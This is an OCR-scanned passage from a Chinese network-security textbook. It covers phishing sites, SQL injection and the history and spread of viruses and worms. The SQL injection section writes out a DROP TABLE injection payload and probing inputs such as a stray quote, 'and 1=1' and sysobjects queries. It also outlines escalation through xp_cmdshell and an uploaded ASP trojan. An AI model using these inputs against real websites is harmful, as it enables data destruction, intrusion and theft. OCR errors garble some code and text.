IE 等 浏览 器 一 般 都 有 地 址 栏 和 状态 栏 ,连接 到 某 个 站 点 时 ,地 址 栏 和 状态 栏 中 显示 相 
应 的 信息 。 为 了 防止 用 户 由 此 发 现 问题 ,攻击 者 往往 还 要 用 JavaScript 程序 重 写 地 址 栏 和 
状态 栏 ,以 覆盖 真实 信息 ,达到 欺骗 的 目的 。 

更 进一步 ,如 果 这 个 网 站 是 与 金融 相关 的 ,如 网 络 银行 ,那么 当 用 户 登录 时 ,输入 的 用 户 
名 和 密码 就 会 被 截取 ,然后 再 转向 真正 的 网 银 站 点 。 当 用 户 结束 操作 后 ,账号 内 的 资金 说 不 
定 就 流入 黑客 圳 中 。 这 就 是 近年 来 颇 受 关注 的 “钓鱼 网 站 ”的 一 种 实现 方法 。 


2.5.5 SQL 注入 


Web 浏览 是 上 网 用 户 普遍 使 用 的 一 项 网 络 应 用 ,因此 针对 网 站 的 攻击 很 多 ,SQL 注入 
就 是 利用 网 站 开发 中 的 安全 漏洞 进行 攻击 的 一 种 形式 。 

2.5.5.1 SQL 注入 攻击 的 概念 

SQL 注入 攻击 最 常见 的 原因 是 动态 构造 了 SQL 语句 , 却 没有 使 用 正确 的 参数 。 例 如 ， 
下 面 的 SQL 查询 代码 ,其 目的 是 根据 由 查询 字符 串 提供 的 用 户 身份 证 号 (card_no 字段 ) 来 
查询 用 户 的 姓名 (usr_name 字段 ) 等 信息 ,例如 ,图 2.16 的 网 页 就 需要 根据 用 户 的 身份 证 号 
码 来 登录 。 

String ls_sql, card_no 


card no = Request.QueryString("card no") 
ls_sql = "SELECT * FROM user WHERE card no = '"" + card no + """ 


























如 个 人 用 户 登 录 
公积金 卡号 
密码; 

[| 个 人 用 户 登 录 
身份 证 号 码 : 
密码 : 


图 2.16 某 市 公积金 查询 页 面 


在 正常 情况 下 ,用 户 会 使 用 身份 证 号 来 访问 这 个 网 站 ,编码 的 执行 顺序 如 下 : 
(1) 浏览 器 的 URL 指向 包含 上 述 代 码 的 页 面 。 

(2) 用 户 在 页 面 上 输入 自己 的 身份 证 号 码 。 

(3) 数据 库 服务 器 执行 SQL 语句 。 

上 述 对 于 数据 库 的 SQL 查询 在 执行 时 具体 的 查询 代码 为 


Select * FROM user WHERE card no = "320103 x*xxxxxxx 201x" 
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这 是 开发 人 员 预 期 的 做 法 ,通过 身份 证 号 码 来 查询 数据 库 中 用 户 的 具体 信息 。 然 而 ,如 
果 参 数值 没有 被 正确 地 编码 (encoded) ,那么 ,黑客 可 以 很 容易 地 修改 查询 字符 串 的 值 ,例如 
在 后 面 嵌 入 附加 的 SQL 语句 : 


Select * FROM user WHERE card no = ''; DROP TABLE user; -一 

在 上 面 这 行 语 句 中 ,查询 字符 串 的 值 为 空 ,后 面 添 加 “; DROP TABLE user --'”, 通 过 
“;” 字 符 终 止 当前 的 SQL 语句 ,并 添加 了 自己 的 恶意 的 SQL 语句 ,然后 把 语句 的 其 他 部 分 
用 “--" 字 符 串 注释 掉 。 这 样 ,实际 语句 为 : 


Select * 
FROM user 
WHERE card no = "'; // 查 询 条 件 为 空 ,查询 结果 为 空 


DROP TABLE user; // 删 除数 据 库 中 的 user 表 

a // 注 释 语句 ,后 面 的 不 被 执行 

这 串 语句 的 执行 结果 是 : 数据 库 先 对 user 表 进 行 查询 ,然后 把 这 张 表 删除 。 也 就 是 ， 
这 一 次 还 可 以 查 表 , 查 过 之 后 表 就 不 存在 了 ! 更 有 甚 者 ,恶意 代码 可 以 删除 更 多 数据 表 , 甚 
至 删除 数据 库 。 

实际 上 仅仅 删除 数据 库 还 不 是 最 糟糕 的 ,黑客 可 以 不 摧毁 数据 ,而 是 利用 SQL 注入 攻 
击 , 在 数据 库 中 执行 如 JOIN 等 语句 ,获取 各 种 数据 并 显示 在 页 面 上 ,包括 用 户 名 、 密 码 、 信 
用 卡号 码 等 。SQL 注入 的 手法 相当 灵活 ,黑客 还 可 以 通过 添加 UPDATE INSERT 等 语句 
改变 各 种 信息 ,添加 新 的 管理 员 账 号 ,从 而 成 功 获 取 想 要 的 数据 …… 可 以 想象 ,这 些 动作 完 
全 可 以 让 数据 系统 彻底 混乱 。 

SQL 注入 是 从 正常 的 WWW 端口 访问 ,而 且 表 面 上 跟 一 般 的 Web 页 面 访问 没什么 区 
别 。 因 此 ,通常 防火 墙 也 不 会 对 SQL 注入 发 出 警报 ,如 果 管 理 员 没有 查看 IIS 日 志 的 习惯 ， 
可 能 被 入侵 很 长 时 间 都 不 会 发 觉 。 

2.5.5.2 判定 网 站 是 否 可 进行 SQL 注入 攻击 的 步骤 

寻找 容易 受到 SQL 注入 攻击 的 网 站 的 步骤 如 下 ,操作 并 不 复杂 : 

(1) 寻找 动态 网 站 , 即 那 些 可 以 带 查 询 字 符 串 的 ,能 够 与 用 户 进 行动 态 交互 的 网 站 ,这 
样 的 网 站 有 很 多 ,例如 http://www. xx#x#x .com. cn/viewtext. asp?id 二 144581。 

(2) 给 这 个 网 站 发 送 一 个 请 求 , 改 变 其 中 的 id 一 … 语 句 , 带 一 个 额外 的 单 引 号 ,试图 取 
消 其 中 的 SQL 语句 ,例如 id 一 144581 '。 

(3) 分 析 返 回 的 回复 ,在 其 中 查找 SQL query 这 类 关键 字 , 这 些 往往 表示 应 用 返回 了 
详细 的 错误 消息 。 

(4) 检查 错误 消息 ,如 果 表 示 发 送 到 SQL 服务 器 的 参数 没有 被 正确 加 码 , 就 意味 着 可 
对 该 网 站 进行 SQL 注入 攻击 。 

Michael Sutton 通过 Google 寻找 到 1000 个 网 站 ,并 进行 了 随机 取样 测试 ,检测 到 其 中 
的 11.3% 容 易 受 到 SQL 注入 攻击 。 这 意味 着 黑客 可 以 远程 利用 那些 应 用 里 的 数据 ,获取 
任何 没有 加 密 的 密码 或 信用 卡 数据 ,甚至 有 可 能 以 管理 员 身 份 登录 进 这 些 应 用 。 这 对 于 使 
用 网 站 的 消费 者 或 用 户 来 说 很 粳 糕 ,因为 他 们 并 没有 意识 到 正在 使 用 的 网 站 有 着 很 大 的 
风险 。 
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2.5.5.3 SQL 注入 攻击 的 步骤 

1. 判定 SQL 注入 漏洞 

在 确定 可 对 网 站 进行 SQL 注入 攻击 后 ,可 以 先 调整 浏览 器 的 安全 设置 ,例如 ,在 
Internet Explorer 中 选择 菜单 “工具 ”一 “Internet 选项 ”命令 ,在 “高 级 ”选项 卡 中 将 “显示 友 
好 HTTP 错误 信息 ”前 面 的 钓 去掉 。 下 面 以 HTTP://www. xxx . com/ viewtext. asp?id 一 X 
为 例 进 行 分 析 ,X 可 能 是 整 型 参数 ,也 有 可 能 是 字符 串 型 参数 。 

1) X 为 整 型 参数 

当 输 入 的 参数 X 为 整 型 时 ,通常 viewtext. asp 中 SQL 语句 大 致 为 


Select * from table where field=X 


可 以 用 以 下 步骤 测试 SQL 注入 是 否 存 在 : 
(1) 附加 一 个 单 引 号 : HTTP:// www. x*xx .com/ viewtext. asp? id 一 X', 运 行 异 常 。 
此 时 viewtext. asp 中 的 SQL 语句 变 成 


select * from table where field=X" 


(2) 输入 HTTP:// www. x*x#* .com/ viewtext. asp? id 一 X and 1 一 1,viewtext. asp 运 
行 正常 ,而 且 与 www. x**x* . com/ viewtext. asp? id 一 X 的 运行 结果 相同 。 

(3) 输入 HTTP:// www. xxx* .com/ viewtext. asp? id 一 X and 1 二 2,viewtext. asp 运 
行 异常 。 

如 果 (1) 一 (3) 都 满足 ,viewtext. asp 中 一 定 存在 SQL 注入 漏洞 。 

2) X 为 字符 串 型 参数 

当 输入 的 参数 X 为 字符 串 时 ,通常 viewtext. asp 中 SQL 语句 大 致 为 


select * from table where field= 'X' 


可 以 用 以 下 步骤 测试 SQL 注入 是 否 存在 : 

(1) 附加 一 个 单 引号 : HTTP:// www。#*xx .com/ viewtext. asp?id 一 X' ,运行 异常 。 
此 时 viewtext. asp 中 的 SQL 语句 变 成 

select * from table where field= 'X"' 


(2) 输入 HTTP:// www. xx#x . com/ viewtext. asp? id 一 X &.…; 1'=']',viewtext. asp 
运行 正常 ,而 且 与 www。#*x#x . com/ viewtext. asp? id 一 X 的 运行 结果 相同 。 

(3) 输入 HTTP:// www. xx#x . com/ viewtext. asp? id 一 X &.…; 1'='2',viewtext. asp 
运行 异常 。 

如 果 (1) 一 (3) 都 满足 ,viewtext, asp 中 一 定 存 在 SQL 注入 漏洞 。 

2. 分 析 数 据 库 服务 器 类 型 

Access、SQL Server 和 Oracle 是 网 站 常用 的 数据 库 服务 器 ,不 同 的 数据 库 有 不 同 的 攻 
击 方法 ,需要 区 别 对 待 。 此 时 ,可 以 通过 数据 库 服 务 器 的 系统 变量 进行 区 分 : 如 SQL Server 
和 Oracle 有 user 等 系统 变量 ,系统 表 是 sysobjects, 在 Web 环境 下 有 访问 权限 ; 而 Access 
的 系统 表 是 msysobjects, 在 Web 环境 下 没有 访问 权限 。 以 下 两 条 语句 : 
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HTTP:// wuw. xx#x .com/ viewtext.asp?id=X and (select count( * ) from sysobjects)>0 

HTTP:// www. xx# .com/ viewtext.asp?id= X and (select count( * ) from msysobjects)> 0 

对 于 SQL Server 和 Oracle 数据 库 , 第 一 条 运行 正常 ,第 二 条 出 现 异常 ; 而 对 于 Access 
数据 库 , 这 两 条 语句 都 会 引起 异常 。 

3. 确定 XP_CMDSHELL 可 执行 情况 

车 当前 连接 数据 的 账号 具有 管理 员 权 限 , 目 master. dbo. xp_cmdshell 扩展 存储 过 程 
(调用 此 存储 过 程 可 以 直接 使 用 操作 系统 的 shell) 能 够 正确 执行 , 则 整个 计算 机 都 可 以 直接 
控制 。 

4. 发 现 Web 虚拟 目录 

Web 虚拟 目录 是 放置 ASP 木马 的 位 置 ,要 确定 其 位 置 , 可 以 尝试 猜测 常用 的 Web 虚拟 
目录 ,一 般 是 C:Ninetpub\wwwroot 或 D:\inetpub\wwwroot 或 EE;\inetpub\wwwroot 等 ， 
而 可 执行 虚拟 目录 是 C:\inetpub\scripts 或 D:\inetpub\scripts 或 EE:\inetpub\scripts 等 。 
也 可 以 遍历 系统 目录 ,分 析 结 果 并 发 现 Web 虚拟 目录 。 

5.。 上 传 ASP 木马 

ASP 木马 是 一 段 有 特殊 功能 的 ASP 代码 ,并 放 入 Web 虚拟 目录 的 scripts 下 ,远程 客 
户 通过 IE 就 可 执行 ,进而 得 到 系统 的 USER 权限 ,实现 对 系统 的 初步 控制 。 上 传 ASP 木 
马 可 以 通过 Web 的 远程 管理 功能 猜 解数 据 库 名 称 、 用 户 名 表 的 名 称 、 用 户 名 字段 及 密码 字 
段 名称 、 用 户 名 与 密码 ; 也 可 以 利用 表 内 容 导 出 为 文件 功能 ,创建 临时 表 , 一 行 一 行 输入 一 
个 ASP 木马 ,然后 用 命令 导出 形成 ASP 文件。 

6. 得 到 系统 的 管理 员 权限 

ASP 木马 只 有 USER 权限 ,要 想 获取 对 系统 的 完全 控制 ,还 要 有 系统 的 管理 员 权 限 。 
提升 权限 的 方法 有 很 多 种 ,如 上 传 木马 修改 开机 自动 运行 的 . ini 文件 等 。 





2.6 网 络 病毒 与 木马 


计算 机 病毒 是 计算 机 技术 和 以 计算 机 为 核心 的 社会 信息 化 进程 发 展 到 一 定 阶段 的 必然 
产物 。 随 着 网 络 的 发 展 和 广泛 应 用 ,病毒 也 随 之 蔓延 到 网 络 的 各 个 角落 。 木 马 程序 也 借 网 
络 之 便 被 形形色色 的 攻击 者 通过 非法 手段 植 人 到 目标 计算 机 中 ,一 边 潜伏 一 边 收集 用 户 的 
各 种 账号 和 密码 ,使 它 的 控制 者 直接 从 中 获 利 。 网 络 病毒 和 木马 流传 广泛 ,对 用 户 的 危害 也 
极其 严重 ,是 当前 杀毒 软件 以 及 个 人 防火 墙 等 防范 的 重点 。 


2.6.1 病毒 概述 

计算 机 病毒 产生 的 原因 有 多 种 ,大致 可 以 归 为 好 奇 . 恶作剧 .报复 心理 .版 权 保 护 以 及 为 
了 达到 特殊 目的 。 

2.6.1.1 病毒 的 发 展 

早 在 1949 年 ,距离 第 一 台 商 用 计算 机 的 出 现 还 有 几 年 时 ,计算 机 的 先驱 者 汉 “。 诺 依 曼 
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在 他 的 一 篇 论文 (复杂 自动 机 组 织 论 ) 中 提出 了 计算 机 程序 能 够 在 内 存 中 自我 复制 ,就 已 经 
把 病毒 程序 的 蓝图 勾勒 出 来 ,但 当时 , 绝 大 部 分 的 计算 机 专家 都 无 法 想象 这 种 会 自我 繁殖 的 
程序 。 

20 世纪 60 年 代 初 ,在 美国 贝尔 实验 室 里 ,3 个 年 轻 的 程序 员 编 写 了 一 个 名 为 ( 磁 芯 
战 ) 的 游戏 ,游戏 中 通过 复制 自身 来 摆脱 对 方 的 控制 ,这 就 是 病毒 的 第 一 个 锥 形 。 

1975 年 ,美国 科普 作家 约翰 布 鲁 勒 尔 写 了 一 本 名 为 (震荡 波 骑 士 ) 的 书 , 该 书 第 一 次 
描写 了 在 信息 社会 中 ,计算 机 成 为 正义 和 邪恶 双方 斗争 工具 的 故事 ,成 为 当年 最 佳 畅 销 书 
之 一 。 

1977 年 夏天 ,托马斯 ， 捷 。 瑞安 的 科幻 小 说 (P-1 的 青春 ;成 为 美国 的 畅销 书 , 稻 动 了 科 
幻 界 。 作 者 幻想 了 世界 上 第 一 个 计算 机 病毒 , 它 可 以 从 一 台 计算 机 传染 到 另 一 台 计 算 机 ,最 
终 控制 了 7000 台 计 算 机 , 酿 成 了 一 场 灾 难 , 这 实际 上 是 计算 机 病毒 的 思想 基础 。 

1983 年 11 月 3 日 ,美国 计算 机 安全 专家 弗 雷 德 。 科 恩 博 士 研 制 出 一 种 在 运行 过 程 中 
可 以 复制 自身 的 破坏 性 程序 。 伦 ， 艾 德 勒 曼 将 它 命名 为 计算 机 病毒 ,并 在 每 周一 次 的 计算 
机 安全 讨论 会 上 正式 提出 。8 小 时 后 专家 们 在 VAX11/750 计算 机 系统 上 运行 该 病毒 程序 ， 
第 一 个 病毒 实验 成 功 , 一 周 后 又 获准 进行 5 个 实验 的 演示 ,从 而 在 实验 上 验证 了 计算 机 病毒 
的 存在 。 从 20 世纪 80 年 代 起 ,IBM 公司 的 PC 系列 微机 因为 性 能 良好 、 价 格 便 宜 , 逐 步 成 
为 世界 微型 计算 机 市 场 上 的 主要 机 型 。 但 是 由 于 IBM PC 系列 微型 计算 机 自身 的 弱点 ,万 
其 是 DOS 操作 系统 的 开放 性 ,给 计算 机 病毒 的 制造 者 提供 了 可 乘 之 机 。 因 此 , 装 有 DOS 操 
作 系统 的 微型 计算 机 成 为 病毒 攻击 的 主要 对 象 。 

1986 年 年 初 ,巴基斯坦 有 两 个 以 编写 软件 为 生 的 兄弟 ,为 了 打击 那些 盗版 软件 的 使 用 
者 ,设计 出 了 一 个 名 为 巴基斯坦 (Brain) 的 病毒 。 该 病毒 是 一 种 系统 引导 型 病毒 ,在 一 年 内 
流传 到 了 世界 各 地 ,这 就 是 世界 上 第 一 个 真正 的 病毒 。 

1987 年 ,世界 各 地 的 计算 机 用 户 几 乎 同时 发 现 了 形形色色 的 计算 机 病毒 ,如 大 麻 、IBM 
圣诞 树 .黑色 星期 五 等 。 面 对 计算 机 病毒 的 突然 袭击 ,众多 计算 机 用 户 甚 至 专业 人 员 都 惊慌 
失措 。 

1988 年 11 月 3 日 ,美国 6 千 台 计算 机 被 病毒 感染 ,造成 Internet 不 能 正常 运行 。 这 是 
一 次 非常 典型 的 计算 机 病毒 人 侵 计 算 机 网 络 事件 ,迫使 美国 政府 立即 做 出 反应 ,国防 部 成 立 
了 计算 机 应 急行 动 小 组 ,更 引起 了 世界 范围 的 艇 动 。 此 病毒 的 作者 为 罗伯特 ， 葛 里 斯 ,当年 
23 岁 ,在 康 奈 尔 大 学 攻读 硕士 学 位 。 

1996 年 ,首次 出 现 针对 微软 公司 Office 的 “ 宏 病 毒 ”。 

1998 年 ,出 现 针对 Windows 95/98 系统 的 病毒 ,如 CIH 病毒 。CIH 病毒 是 继 DOS 病 
毒 、Windows 病毒 、 宏 病毒 后 的 第 四 类 新 型 病毒 。 这 种 病毒 与 DOS 下 的 传统 病毒 有 很 大 不 
同 , 它 使 用 面向 Windows 的 VXD 技术 编制 。1998 年 8 月 从 中 国 台湾 地 区 传 和 人 大陆, 共有 3 
个 版 本 : 1.2 版 /1.3 版 /1.4 版 ,发 作 时 间 分 别 是 4 月 26 日 /6 月 26 日 /每 月 26 日 。 该 病毒 
是 第 一 个 直接 攻击 ,破坏 硬件 的 计算 机 病毒 ,是 迄今 为 止 破坏 最 为 严重 的 病毒 。 它 主要 感染 
Windows 95/98 的 可 执行 程序 ,发 作 时 破坏 计算 机 Flash BIOS 芯片 中 的 系统 程序 ,导致 主 
板 损坏 ,同时 破坏 硬盘 中 的 数据 。 病 毒 发 作 时 ,硬盘 驱动 器 不 停 旋转 ,硬盘 上 所 有 数据 (包括 
分 区 表 ) 被 破坏 ,必须 重新 执行 FDISK 才 有 可 能 挽救 硬盘 ; 同时 ,对 于 部 分 厂 牌 的 主板 (如 
技嘉 和 微星 等 ) ,该 病毒 会 将 Flash BIOS 中 的 系统 程序 破坏 ,造成 开机 后 系统 无 反应 。 
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1999 年 , 梅 丽 莎 病毒 席卷 欧美 大 陆 ,是 世界 上 最 大 的 一 次 病毒 浩劫 ,也 是 最 大 的 一 次 网 
络 蠕虫 大 泛滥 ,通过 E-mail 的 传播 ,16 个 小 时 内 席卷 了 全 球 Internet, 至 少 造成 10 亿美 元 
的 损失 。 

随 着 网 络 的 不 断 发 展 , 网 络 蠕虫 已 经 成 为 病毒 主力 , 它 在 Internet 上 通过 一 台 计 算 机 自 
动 传播 到 另 一 台 计 算 机 ,利用 电子 邮件 .远程 执行 .远程 登录 等 方式 ,在 网 络 中 不 断 复 制 自 
己 , 从 而 感染 其 他 计算 机 。 

2003 年 8 月 12 日, 蠕虫" 冲击波 (Worm. Blaster) ”病毒 全 球 爆发 ,由 于 该 病毒 是 利用 系 
统 漏洞 进行 传播 ,因此 ,没有 打 补 丁 的 计算 机 都 会 感染 该 病毒 ,从 而 使 计算 机 出 现 系统 重启 、 
无 法 正常 上 网 等 现象 。 

2004 年 5 月 1 日 ,蠕虫 “震荡 波 (Worm. Sasser)” 病 毒 在 网 络 出 现 ,该 病毒 也 是 通过 系统 
漏洞 进行 传播 ,感染 了 病毒 的 计算 机 会 出 现 系统 反复 重启 、 机 器 运行 缓慢 、 出 现 系统 异常 的 
出 错 框 等 现象 。 

2006 一 2007 年 ,出 现 熊猫 烧香 病毒 。 能 猫 烧香 是 一 种 经 过 多 次 变种 的 蠕虫 病毒 ,2006 
年 10 月 16 日 由 25 岁 的 中 国 湖北 人 李 俊 编写 ,2007 年 1 月初 肆虐 网 络 。 这 是 一 波 计算 机 
病毒 蔓延 的 狂潮 。 在 极 短 时 间 之 内 就 可 以 感染 几 千 台 计 算 机 ,严重 时 可 以 导致 网 络 瘫 疯 。 
那 只 惑 态 可 斤 、 颌 首 敬 香 的 “熊猫 ” 除 而 不 尽 。 反 病毒 工程 师 们 将 它 命 名 为 “ 尼 姆 亚 *”。 病 毒 
变种 使 用 户 计算 机 中 毒 后 可 能 会 出 现 蓝 屏 ,频繁 重启 以 及 系统 硬盘 中 数据 文件 被 破坏 等 现 
象 。 同 时 ,该 病毒 的 某 些 变种 可 以 通过 局 域 网 进行 传播 ,进而 感染 局 域 网 内 所 有 计算 机 系 
统 ,最 终 导致 企业 局 域 网 瘫痪 ,无 法 正常 使 用 , 它 能 感染 系统 中 exe、com、pif、src、html、asp 
等 文件 , 它 还 能 终止 大 量 的 反 病毒 软件 进程 并 且 删 除 扩展 名 为 gho 的 备份 文件 。 被 感染 的 
用 户 系 统 中 所 有 exe 可 执行 文件 全 部 被 改 成 熊猫 举 着 三 根 香 的 模样 。 

2009 一 2010 年 ,出现 震 网 (Stuxnet) 病 毒 。 震 网 是 一 种 Windows 平台 上 针对 工业 控制 
系统 的 计算 机 蠕虫 , 它 是 首 个 旨 在 破坏 真实 世界 而 非 虚拟 世界 的 计算 机 病毒 ,利用 西门 子 公 
司 控制 系统 (SIMATIC WinCC/Step7) 存 在 的 漏洞 感染 数据 采集 与 监控 系统 (SCADA), 向 
可 编程 逻辑 控制 器 (PLC) 写 入 代码 并 将 代码 隐藏 。 这 是 有 史 以 来 第 一 个 包含 PLC Rootkit 
的 计算 机 蠕虫 ,也 是 已 知 的 第 一 个 以 关键 工业 基础 设施 为 目标 的 蠕虫 。 据 报道 ,该 蠕虫 病毒 
可 能 已 感染 并 破坏 了 伊朗 纳 坦 兹 的 核 设施 .并 最 终 使 伊朗 的 布什 和 尔 核 电站 推迟 启动 。 

2014 年 3 月 ,敲诈 者 病毒 兴起 ,PC 端 \ 手 机 端 敲诈 者 病毒 导致 大 量 用 户 受 害 。 敲 诈 者 
病毒 会 加 密 硬 盘 、 手 机 存储 卡 中 的 重要 文件 ,在 计算 机 上 或 手机 上 弹出 勒索 钱财 的 提示 。 一 
部 分 敲诈 者 变种 加 密 的 文件 可 以 实现 技术 解密 , 另 有 部 分 只 有 病毒 作者 可 以 解 开 , 不 甘 被 勒 
索 的 网 民 将 面临 数据 无 法 访问 的 结果 。 

随 着 网 游 和 电子 商务 的 发 展 ,近年 还 出 现 了 针对 游戏 和 淘宝 的 新 病毒 ,如 主要 依靠 带 毒 
游戏 外 挂 或 色 播 传播 的 鬼 影 病毒 ,以 及 新 淘宝 客 病毒 ,后 者 是 一 种 利用 驱动 过 滤 劫持 淘宝 网 
搜索 结果 的 病毒 ,使 用 了 游戏 捆绑 .加 数字 签名 、 隐 藏 过 滤 、 切 断 云 扫描 等 方法 ,使 得 病毒 的 
隐藏 能 力 大 大 增强 。 

2.6.1.2 病毒 的 定义 

计算 机 病毒 自 出 现 后 ,其 危害 就 与 日 俱 增 。 病毒 的 危害 主要 体现 在 几 个 方面 : 

。 直接 破坏 计算 机 数据 信息 。 

。 大量 占用 磁盘 空间 。 
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。 运行 时 抢占 系统 资源 ,影响 计算 机 运行 速度 。 

。 计算 机 病毒 含有 的 错误 导致 不 可 预见 的 危害 。 

美国 计算 机 安全 专家 Fred Cohen 在 1984 年 给 出 了 计算 机 病毒 的 定义 ,“ 计 算 机 病毒 是 
一 种 程序 , 它 可 以 感染 其 他 程序 ,感染 的 方式 为 在 被 感染 程序 中 加 入 计算 机 病毒 的 一 个 副 
本 ,这 个 副本 可 能 是 在 原 病毒 基础 上 演变 过 来 的 。” 

1994 年 2 月 18 日 ,我 国正 式 颁 布 实施 了 《中 华人 民 共和 国 计 算 机 信息 系统 安全 保护 条 
例 》, 在 第 28 条 中 明确 指出 :“ 计 算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 
功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。” 

今天 出 现在 计算 机 领域 中 的 计算 机 病毒 是 一 组 程序 ,一段 可 执行 码 , 它 可 以 自我 复制 并 
可 以 感染 计算 机 的 很 多 组 成 部 分 ,如 文档 ,程序 和 操作 系统 的 组 成 部 分 。 大 多 数 病 毒 都 将 自 
己 附 加 到 文件 或 硬盘 中 ,然后 将 它们 自己 复制 到 操作 系统 内 的 其 他 位 置 。 某 些 病 毒 包含 代 
码 , 这 些 代码 通过 删除 文件 或 降低 安全 设置 实现 更 进一步 的 攻击 来 造成 额外 的 破坏 。 

2.6.1.3 病毒 的 特征 和 分 类 

病毒 的 特征 可 以 概括 为 人 为 的 特制 程序 .自我 复制 能 力 、 很 强 的 感染 性 、 一 定 的 潜伏 性 、 
特定 的 触发 性 和 很 大 的 破坏 性 。 

按照 计算 机 病毒 的 特点 及 特性 ,计算 机 病毒 的 分 类 方法 有 许多 种 。 按 照 计算 机 病毒 攻 
击 的 系统 可 分 为 攻击 DOS 系统 的 病毒 .攻击 Windows 系统 的 病毒 ,攻击 UNIX 系统 的 病 
毒 ; 按照 计算 机 病毒 的 链 结 方式 可 分 为 源码 型 病毒 .嵌入 型 病毒 .外 壳 型 病毒 .操作 系统 型 
病毒 ; 按照 寄生 方式 可 分 为 引导 型 病毒 ,文件 型 病毒 .混合 型 病毒 ; 按 传染 途径 可 分 为 驻 留 
内 存 型 病毒 和 不 驻 留 内 存 型 病毒 等 。 


2.6.2 网 络 病毒 


在 早期 的 单机 计算 机 环境 中 ,病毒 并 不 是 一 件 非 常 令 人 头痛 的 事 , 只 要 不 用 来 路 不 明 的 
磁盘 ,基本 上 可 以 防止 80%% 的 病毒 人 侵 。 但 是 进入 Internet 时 代 后 , 绝 大 部 分 的 信息 经 由 
Internet 传输 ,因此 Internet 目前 已 成 为 病毒 最 大 的 来 源 地 。 计 算 机 网 络 系统 的 建立 使 多 
台 计算 机 能 够 共享 数据 资料 和 外 部 资源 ,然而 也 给 计算 机 病毒 带 来 了 更 为 有 利 的 生存 和 传 
播 环 境 。 在 网 络 环境 下 ,病毒 可 以 按 指数 增长 速度 进行 传染 。 病 毒 一 旦 侵入 计算 机 网 络 ,会 
导致 计算 机 效率 急剧 下 降 , 系 统 资 源 遭 到 严重 破坏 ,并 在 短 时 间 内 造成 网 络 系统 的 瘫痪 。 因 
此 网 络 环境 下 的 病毒 防治 已 成 为 目前 反 病毒 领域 的 研究 重点 。 

2.6.2.1 网 络 病毒 的 特点 

在 网 络 环境 下 ,病毒 除了 具有 传染 性 、 隐 项 性 潜伏 性 、 破 坏 性 、 不 可 预见 性 和 触发 性 等 
计算 机 病毒 的 共性 外 ,还 具有 一 些 新 的 特点 : 

(1) 传染 速度 快 。 在 单机 环境 下 ,病毒 只 能 通过 软盘 从 一 台 计 算 机 传染 到 另 一 台 计 算 
机 ,而 在 网 络 中 则 可 以 通过 网 络 迅 速 扩散 。 

(2) 扩散 面 广 。 由 于 病毒 在 网 络 中 扩散 速度 快 ,扩散 范围 广 , 不 但 能 迅速 传染 局 域 网 内 
所 有 计算 机 ,更 能 在 瞬间 通过 远程 工作 站 将 病毒 传播 到 千里 之 外 。 

(3) 传播 的 形式 复杂 多 样 。 计 算 机 病毒 在 网 络 上 可 以 通过 “工作 站 一 服务 器 一 工作 站 ” 
方式 传播 ,也 可 以 通过 “工作 站 一 工作 站 ”方式 传播 ,传播 途径 多 样 ,传播 形式 复杂 。 
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(4) 难于 彻底 清除 。 单 机 上 的 计算 机 病毒 有 时 可 通过 删除 带 毒 文件 、 低 级 格式 化 硬盘 
等 措施 彻底 清除 ,而 在 网 络 中 ,只 要 有 一 台 工 作 站 病毒 未 能 清除 干净 ,就 可 能 使 整个 网 络 重 
新 被 病毒 感染 ,甚至 刚刚 完成 清除 工作 的 一 台 工 作 站 又 有 可 能 被 网 上 另 一 台 带 毒 工作 站 所 

(5) 破坏 性 大 。 网 络 上 病毒 将 直接 影响 网 络 的 工作 , 轻 则 降低 速度 ,影响 工作 效率 , 重 
则 使 网 络 骨 溃 ,破坏 服务 器 信息 ,使 多 年 工作 毁 于 一 旦 。 

2.6.2.2 网 络 病毒 的 传播 


内 部 局 域 网 通常 包括 网 络 服务 器 和 若干 网 络 客户 端 计算 机 (包括 有 盘 工 作 站 ,无 盘 工 作 
站 和 远程 工作 站 )。 计 算 机 病毒 一 般 首先 通过 有 盘 工 作 站 传播 到 硬盘 ,进入 网 络 后 再 进一步 
在 网 上 传播 。 具 体 来 说 ,其 传播 方式 有 如 下 几 种 : 
。 病毒 直接 从 有 盘 站 复制 到 服务 器 中 。 
。 病毒 先 传染 工作 站 ,在 工作 站 内 存 驻 留 ,等 运行 映射 网 络 盘 内 程序 时 再 传染 给 服 
务 器 。 
。 病毒 先 传染 工作 站 ,在 工作 站 内 存 驻 留 ,在 运行 时 直接 通过 映射 路 径 传染 到 服务 器 。 
。 如果 远程 工作 站 被 病毒 侵入 ,病毒 也 可 以 通过 通信 中 的 数据 交换 进入 网 络 服务 
器 中 。 
如 图 2. 17 所 示 ,病毒 通过 磁盘 操作 从 一 台 工作 站 进入 到 网 络 中 ,能 够 很 快感 染 网 络 上 
没有 采取 任何 防护 措施 的 其 他 工作 站 和 服务 器 ,并 能 够 感染 远程 用 户 。 






远程 用 户 


与 到 本 


工作 站 


2.17 病毒 通过 网 络 传播 示意 图 


2.6.2.3 网 络 蠕虫 


1988 年 ,美国 康 奈 尔 大 学 研究 生 英里 斯 编写 的 蠕虫 病毒 通过 Internet 疯狂 蔓延 ,造成 
了 数 千 台 计算 机 停机 ,蠕虫 病毒 开始 现 身 网 络 。 而 后 来 的 红色 代码 、 尼 姆 达 病 毒 最 疯狂 的 时 
候 也 造成 几 十 亿美 元 的 损失 。2003 年 1 月 26 日 ,一 种 名 为 “2003 蠕虫 王 ? 的 计算 机 病毒 迅 
速 传播 并 袭击 了 全 球 ,致使 Internet 严重 堵塞 ,作为 Internet 主要 基础 的 域名 服务 器 
(Domain Name Service, DNS) 竣 痪 ,造成 网 民 浏 览 Internet 网 页 及 收发 电子 邮件 的 速度 大 
幅 减缓 ,同时 网 上 银行 自动 提 款 机 中 断 运 行 ,机 票 等 网 络 预 订 系 统 也 中 断 服务 ,信用 卡 等 收 
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付款 系统 出 现 故障 。 专 家 估计 ,此 病毒 造成 的 直接 经 济 损失 至 少 在 12 亿美 元 以 上 。 蠕 虫 病 
毒 对 网 络 系统 的 正常 使 用 具有 极 大 的 杀伤 力 。 

2011 年 ,国内 出 现 首 个 QQ 群 蠕虫 病毒 (Win32. Troj. Pincav) ,该 病毒 伪装 成 电视 棒 破 
解 程序 欺骗 网 民 下 载 , 盗 取 魔 曾 .邮箱 及 社交 网 络 账号 ,中 毒 后 病毒 会 利用 QQ 群 共享 漏洞 
